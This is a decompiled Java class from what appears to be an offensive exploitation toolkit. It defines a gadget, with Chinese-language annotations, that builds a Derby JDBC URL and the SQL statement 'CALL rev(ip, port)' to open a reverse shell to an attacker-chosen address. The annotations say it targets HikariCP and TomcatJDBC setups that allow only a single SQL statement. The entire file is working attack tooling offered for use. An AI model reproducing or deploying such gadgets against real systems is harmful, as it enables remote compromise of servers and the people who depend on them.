package com.ar3h.chains.gadget.impl.common.jdbc.derby.singlesql;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.param.Param;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Map;

@GadgetAnnotation(name = "6.Derby 调用rev函数反弹shell 单SQL", description = "适用于HikariCP和TomcatJDBC仅能执行单条SQL情况\nCALL rev('\" + ip + \"', '\" + port + \"')", dependencies = {"derby:org.apache.derby.jdbc.EmbeddedDriver"}, authors = {Authors.X1r0z})
@GadgetTags(tags = {Tag.DerbyJdbcUrl, Tag.JdbcUrlWithSQLChains, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/jdbc/derby/singlesql/DerbyReverseShellJdbc.class */
public class DerbyReverseShellJdbc implements Gadget {

    @Param(name = "数据库名")
    public String database = "dbtest";

    @Param(name = "反连ip")
    public String ip = "127.0.0.1";

    @Param(name = "反连port")
    public String port = "9999";
    public String driverClassName = "org.apache.derby.jdbc.EmbeddedDriver";

    public Map getObject() {
        String str = "jdbc:derby:" + this.database + ";create=true";
        ArrayList arrayList = new ArrayList();
        arrayList.add("CALL rev('" + this.ip + "', '" + this.port + "')");
        HashMap hashMap = new HashMap();
        hashMap.put(ContextTag.JDBC_DRIVER, this.driverClassName);
        hashMap.put(ContextTag.JDBC_URL, str);
        hashMap.put(ContextTag.JDBC_URL_SQL_LIST, arrayList);
        return hashMap;
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        Map object = getObject();
        gadgetContext.put(ContextTag.DRIVER_CLASS_NAME_KEY, this.driverClassName);
        return object;
    }
}
